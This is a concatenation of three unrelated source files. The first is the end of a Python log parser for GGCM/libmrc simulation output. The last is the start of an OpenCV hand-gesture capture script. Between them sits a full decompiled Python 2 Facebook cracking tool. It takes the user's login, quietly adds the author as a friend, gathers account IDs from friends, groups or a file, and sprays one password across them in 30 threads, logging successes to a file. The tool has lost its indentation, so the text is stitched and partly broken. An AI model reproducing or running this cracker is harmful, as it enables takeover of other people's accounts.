                            _info["{0}_type".format(armed)] = clstype.group(1)
                            # yes, keep armed, for super's parameters
                        elif line == "":
                            armed = False
                else:
                    try:
                        c = re.match(r"=+ class == (.+)", line).group(1)
                        c = c.strip()
                        if c in self.watched_classes:
                            armed = c
                            # the next lines just say
                            # "parameter | value"
                            # "-----------|------"
                            # ignore them
                            next(lines_iter)
                            next(lines_iter)
                    except AttributeError:
                        # not the start of a new class view, that's ok
                        pass
        # translate the integer mhd_type into its enum name when possible
        try:
            mhd_type = _info["ggcm_mhd_fld_mhd_type"]
            _info["ggcm_mhd_fld_mhd_type_str"] = MHD_TYPES[mhd_type]
        except (IndexError, KeyError):
            _info["ggcm_mhd_fld_mhd_type_str"] = "UNKNOWN"
        self.info = _info

    @staticmethod
    def _parse_value(s):
        """Parse a parameter and infer its type

        Parameters:
            s (str): the value of a libmrc parameter

        Returns:
            Either an int, float, string, or list of mixed types as
            inferred by the data
        """
        try:
            return int(s)
        except ValueError:
            pass
        try:
            return float(s)
        except ValueError:
            pass
        s = s.strip()
        # comma separated values become a numpy array of parsed elements
        if re.match(r"\-?[\d\.]+(\s*,\s*\-?[\d\.]+)+", s):
            l = s.split(",")
            for i, s in enumerate(l):
                try:
                    l[i] = int(s)
                except ValueError:
                    try:
                        l[i] = float(s)
                    except ValueError:
                        l[i] = s.strip()
            return np.array(l)
        # colon separated tokens become a plain list of strings
        elif re.match(r"[A-Za-z\d\.\-]+(\s*:\s*[A-Za-z\d\.\-]+)+", s):
            return s.split(":")
        else:
            return s

    @classmethod
    def _parse_param(cls, s):
        """Parse a libmrc view output line

        Parameters:
            s (str): full line of a parameter in the view

        Raises
            ValueError: If there is > 1 '|' character in s
        """
        key, val = [part.strip() for part in s.split("|")]
        val = cls._parse_value(val)
        return key, val

    def unload(self, **kwargs):
        # drop the parsed info, then defer to the base class unload
        self.info = {}
        super(GGCMLogFile, self).unload(**kwargs)
##
## EOF
##
|
#Decompiled At:Thu Mar 12 20:23:01 2020
import os, sys, time, hashlib, json, requests, mechanize, urllib, cookielib, re
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print '\x1b[1;97m[!] \x1b[1;91mExit'
os.sys.exit()
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.05)
logo = '\x03\x00\x00\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x97\n\x1b[1;97m\xe2\x95\x91 \x1b[1;96m\xe2\x95\x94\xe2\x95\x90\xe2\x95\x97\xe2\x94\xac \xe2\x94\xac\xe2\x94\x8c\xe2\x94\xac\xe2\x94\x90\xe2\x94\x8c\xe2\x94\x80\xe2\x94\x90 \xe2\x95\x94\xe2\x95\xa6\xe2\x95\x97\xe2\x95\x94\xe2\x95\x97 \xe2\x95\x94\xe2\x95\x90\xe2\x95\x97 \x1b[1;97m \xe2\x95\x91\n\x1b[1;97m\xe2\x95\x91 \x1b[1;96m\xe2\x95\xa0\xe2\x95\x90\xe2\x95\xa3\xe2\x94\x82 \xe2\x94\x82 \xe2\x94\x82 \xe2\x94\x82 \xe2\x94\x82 \xe2\x95\x91\xe2\x95\x91\xe2\x95\x91\xe2\x95\xa0\xe2\x95\xa9\xe2\x95\x97\xe2\x95\xa0\xe2\x95\xa3 \x1b[1;91m<(\xe2\x96\xba_\xe2\x97\x84)> \x1b[1;97m \xe2\x95\x91\n\x1b[1;97m\xe2\x95\x91 \x1b[1;96m\xe2\x95\xa9 \xe2\x95\xa9\xe2\x94\x94\xe2\x94\x80\xe2\x94\x98 \xe2\x94\xb4 \xe2\x94\x94\xe2\x94\x80\xe2\x94\x98 \xe2\x95\xa9 \xe2\x95\xa9\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x95\x9a \x1b[1;97m \xe2\x95\x91\n\x1b[1;97m\xe2\x95\x91 Author \x1b[1;91m: \x1b[1;92mMr-XsZ \x1b[1;97m \xe2\x95\x91\n\x1b[1;97m\xe2\x95\x91 FB \x1b[1;91m: \x1b[1;93mhttps://fb.me/angga.pro.980967 \x1b[1;97m\xe2\x95\x91\n\x1b[1;97m\xe2\x95\x91 Github \x1b[1;91m: \x1b[1;92mhttps://github.com/Mr-XsZ 
\x1b[1;97m\xe2\x95\x91\n\x1b[1;97m\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d\x00\x00'
def tik():
titik = [
'. ', '.. ', '... ']
for o in titik:
print '\r\x1b[1;97m[\xe2\x97\x8f] \x1b[1;92mSedang masuk \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(1)
back = 0
cp = []
ok = []
id = []
def login():
os.system('clear')
try:
token = open('login.txt', 'r')
MBF()
except (KeyError, IOError):
os.system('clear')
print logo
print '\x1b[1;97m[\xe2\x98\x86] \x1b[1;92mLOGIN AKUN FACEBOOK ANDA \x1b[1;97m[\xe2\x98\x86]'
id = raw_input('\x1b[1;97m[+] \x1b[1;92mID/Email \x1b[1;91m: \x1b[1;97m')
pwd = raw_input('\x1b[1;97m[+] \x1b[1;92mPassword \x1b[1;91m: \x1b[1;97m')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print '\n\x1b[1;97m[!] \x1b[1;91mTidak ada koneksi'
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig = 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=' + id + 'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword=' + pwd + 'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {'api_key': '882a8490361da98702bf97a021ddc14d', 'credentials_type': 'password', 'email': id, 'format': 'JSON', 'generate_machine_id': '1', 'generate_session_cookies': '1', 'locale': 'en_US', 'method': 'auth.login', 'password': pwd, 'return_ssl_resources': '0', 'v': '1.0'}
x = hashlib.new('md5')
x.update(sig)
a = x.hexdigest()
data.update({'sig': a})
url = 'https://api.facebook.com/restserver.php'
r = requests.get(url, params=data)
z = json.loads(r.text)
unikers = open('login.txt', 'w')
unikers.write(z['access_token'])
unikers.close()
print '\n\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] \x1b[1;92mLogin Berhasil'
requests.post('https://graph.facebook.com/me/friends?method=post&uids=angga.pro.980967&access_token=' + z['access_token'])
MBF()
except requests.exceptions.ConnectionError:
print '\n\x1b[1;97m[!] \x1b[1;91mTidak ada koneksi'
keluar()
if 'checkpoint' in url:
print '\n\x1b[1;97m[!] \x1b[1;93mCekpoin'
os.system('rm -rf login')
time.sleep(1)
keluar()
else:
print '\n\x1b[1;97m[!] \x1b[1;91mPassword/Email salah'
os.system('rm -rf login.txt')
time.sleep(1)
login()
def MBF():
global token
os.system('clear')
try:
token = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;97m[!] \x1b[1;91mToken invalid'
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
try:
otw = requests.get('https://graph.facebook.com/me?access_token=' + token)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
except KeyError:
os.system('clear')
print '\x1b[1;97m[!] \x1b[1;91mToken invalid'
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print '\x1b[1;97m[!] \x1b[1;91mTidak ada koneksi'
keluar()
os.system('clear')
print logo
print '\x1b[1;97m\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
print '\x1b[1;97m\xe2\x95\x91[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m]\x1b[1;97m Wellcome \x1b[1;92m', nama, ' \x1b[1;97m'
print '\x1b[1;97m\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x97'
print '\x1b[1;97m\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d'
print '\x1b[1;97m\xe2\x95\x91 1. Crack dari daftar teman '
print '\x1b[1;97m\xe2\x95\x91 2. Crack dari teman '
print '\x1b[1;97m\xe2\x95\x91 3. Crack dari grup '
print '\x1b[1;97m\xe2\x95\x91 4. Crack dari file '
print '\x1b[1;97m\xe2\x95\x91\x1b[1;91m 0. Logout \x1b[1;97m'
print '\x1b[1;97m\xe2\x95\x91 '
pilihMBF()
def pilihMBF():
global cp
global ok
p = raw_input('\x1b[1;97m\xe2\x95\x9a\xe2\x95\x90>> \x1b[1;97m')
if p == '':
print '\x1b[1;96m[!] \x1b[1;91mIsi yang benar'
time.sleep(1)
MBF()
else:
if p == '1':
os.system('clear')
print logo
print '\x1b[1;97m\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
jalan('\x1b[1;97m\xe2\x95\x91[\xe2\x9c\xba] \x1b[1;92mMengambil ID \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + token)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif p == '2':
os.system('clear')
print logo
print '\x1b[1;97m\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
idt = raw_input('\x1b[1;97m\xe2\x95\x91[+] \x1b[1;92mMasukan ID teman \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + token)
op = json.loads(jok.text)
print '\x1b[1;97m\xe2\x95\x91[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] \x1b[1;92mNama teman\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;97m\xe2\x95\x91[!] \x1b[1;91mTeman tidak ditemukan!'
print '\x1b[1;97m\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
raw_input('\n\x1b[1;97m[\x1b[1;92mKembali\x1b[1;97m]')
MBF()
jalan('\x1b[1;97m\xe2\x95\x91[\xe2\x9c\xba] \x1b[1;92mMengambil ID \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + token)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif p == '3':
os.system('clear')
print logo
print '\x1b[1;97m\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
idg = raw_input('\x1b[1;97m\xe2\x95\x91[+] \x1b[1;92mMasukan ID group \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + idg + '&access_token=' + token)
asw = json.loads(r.text)
print '\x1b[1;97m\xe2\x95\x91[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] \x1b[1;92mNama group \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;97m\xe2\x95\x91[!] \x1b[1;91mGroup tidak ditemukan'
print '\x1b[1;97m\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
raw_input('\n\x1b[1;97m[\x1b[1;92mKembali\x1b[1;97m]')
MBF()
jalan('\x1b[1;97m\xe2\x95\x91[\xe2\x9c\xba] \x1b[1;92mMengambil ID \x1b[1;97m...')
re = requests.get('https://graph.facebook.com/' + idg + '/members?fields=name,id&limit=999999999&access_token=' + token)
s = json.loads(re.text)
for p in s['data']:
id.append(p['id'])
elif p == '4':
os.system('clear')
print logo
print '\x1b[1;97m\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
try:
idlist = raw_input('\x1b[1;97m\xe2\x95\x91[+] \x1b[1;92mMasukan nama file \x1b[1;91m: \x1b[1;97m')
for line in open(idlist, 'r').readlines():
id.append(line.strip())
except IOError:
print '\x1b[1;97m\xe2\x95\x91[!] \x1b[1;91mFile tidak ditemukan'
print '\x1b[1;97m\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
raw_input('\n\x1b[1;97m[\x1b[1;92mKembali\x1b[1;97m]')
MBF()
elif p == '0':
os.system('rm -rf login.txt')
keluar()
else:
print '\x1b[1;97m[!] \x1b[1;91mIsi yang benar'
MBF()
print '\x1b[1;97m\xe2\x95\x91[+] \x1b[1;92mTotal ID \x1b[1;91m: \x1b[1;97m' + str(len(id))
apa = raw_input('\x1b[1;97m\xe2\x95\x91[?] \x1b[1;92mPassword \x1b[1;91m: \x1b[1;97m')
if apa == '':
print '\x1b[1;97m\xe2\x95\x91[!] \x1b[1;91mIsi yang benar'
print '\x1b[1;97m\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
keluar()
titik = ['. ', '.. ', '... ']
for o in titik:
print '\r\x1b[1;97m\xe2\x95\x91[\x1b[1;92m\xe2\x9c\xb8\x1b[1;97m] \x1b[1;92mStart \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(1)
print
print '\x1b[1;97m\xe2\x95\x91[!] \x1b[1;92mCrack dengan sandi \x1b[1;97m' + apa
print '\x1b[1;97m\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
def main(arg):
user = arg
try:
os.mkdir('out')
except OSError:
pass
else:
try:
a = requests.get('https://graph.facebook.com/' + user + '/?access_token=' + token)
b = json.loads(a.text)
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + apa + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + user + ' \x1b[1;97m==> ' + apa
ok.append(user + apa)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93mCP+\x1b[1;97m] ' + user + ' \x1b[1;97m==> ' + apa
cek = open('out/super_cp.txt', 'a')
cek.write('ID:' + user + ' Pw:' + apa + '\n')
cek.close()
cp.append(user + apa)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print '\x1b[1;97m\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
print '\x1b[1;97m\xe2\x95\x91[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] \x1b[1;92mSelesai \x1b[1;97m....'
print '\x1b[1;97m\xe2\x95\x91[+] \x1b[1;92mTotal OK/\x1b[1;93mCP \x1b[1;91m: \x1b[1;92m' + str(len(ok)) + '\x1b[1;97m/\x1b[1;93m' + str(len(cp))
print '\x1b[1;97m\xe2\x95\x91[+] \x1b[1;92mCP File tersimpan \x1b[1;91m: \x1b[1;97mout/super_cp.txt'
print '\x1b[1;97m\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
raw_input('\n\x1b[1;97m[\x1b[1;92mKembali\x1b[1;97m]')
MBF()
|
# -*- coding: utf-8 -*-
"""
Created on Thu Mar 23 01:01:43 2017
@author: abhisheksingh
"""
#%%
import cv2
import numpy as np
import os
import time
import gestureCNN as myNN
# --- Tunable parameters and shared capture state -----------------------------

minValue = 70          # threshold floor passed to binaryMask's Otsu threshold
x0 = 400               # ROI top-left x in px (adjustable at runtime via i/j/k/l keys)
y0 = 200               # ROI top-left y in px
height = 200           # ROI height in px
width = 200            # ROI width in px
saveImg = False        # when True, each processed ROI is written to disk
guessGesture = False   # when True, each ROI is fed to the CNN for prediction
visualize = False      # when True, prompts once for a layer to visualize
lastgesture = -1       # index of the most recently predicted gesture
kernel = np.ones((15,15),np.uint8)
kernel2 = np.ones((1,1),np.uint8)
skinkernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(5,5))  # used by skinMask erode/dilate

# Which mask mode to use BinaryMask or SkinMask (True|False)
binaryMode = False
counter = 0            # number of samples captured so far for the current gesture

# This parameter controls number of image samples to be taken PER gesture
numOfSamples = 301
gestname = ""          # name/prefix of the gesture folder currently being captured
path = ""              # directory where captured ROI images are written
mod = 0                # loaded CNN model (0 until a menu option loads one)
banner = '''\nWhat would you like to do ?
1- Use pretrained model for gesture recognition & layer visualization
2- Train the model (you will require image samples for training under .\imgfolder)
3- Visualize feature maps of different layers of trained model
'''
#%%
def saveROIImg(img):
    """Write one ROI sample to disk, or reset the capture session once the
    per-gesture quota (numOfSamples) has been reached."""
    global counter, gestname, path, saveImg

    limit = numOfSamples - 1
    if counter > limit:
        # Quota reached: stop capturing and clear the session state.
        saveImg = False
        gestname = ''
        counter = 0
        return

    counter += 1
    name = gestname + str(counter)
    print("Saving img:",name)
    cv2.imwrite(path + name + ".png", img)
    # Small pause between writes so successive frames are not near-duplicates.
    time.sleep(0.04)
#%%
def skinMask(frame, x0, y0, width, height ):
    """Draw the ROI box on ``frame`` and return a skin-color-masked,
    grayscale version of the ROI.

    Pipeline: HSV skin-range mask -> erode/dilate -> Gaussian blur ->
    bitwise-and with the ROI -> grayscale. Depending on the global flags the
    result is additionally saved to disk, classified by the CNN, or used for
    layer visualization.
    """
    global guessGesture, visualize, mod, lastgesture, saveImg

    # HSV values
    low_range = np.array([0, 50, 80])
    upper_range = np.array([30, 200, 255])

    cv2.rectangle(frame, (x0,y0),(x0+width,y0+height),(0,255,0),1)
    roi = frame[y0:y0+height, x0:x0+width]

    hsv = cv2.cvtColor(roi, cv2.COLOR_BGR2HSV)

    #Apply skin color range
    mask = cv2.inRange(hsv, low_range, upper_range)

    mask = cv2.erode(mask, skinkernel, iterations = 1)
    mask = cv2.dilate(mask, skinkernel, iterations = 1)

    #blur
    mask = cv2.GaussianBlur(mask, (15,15), 1)
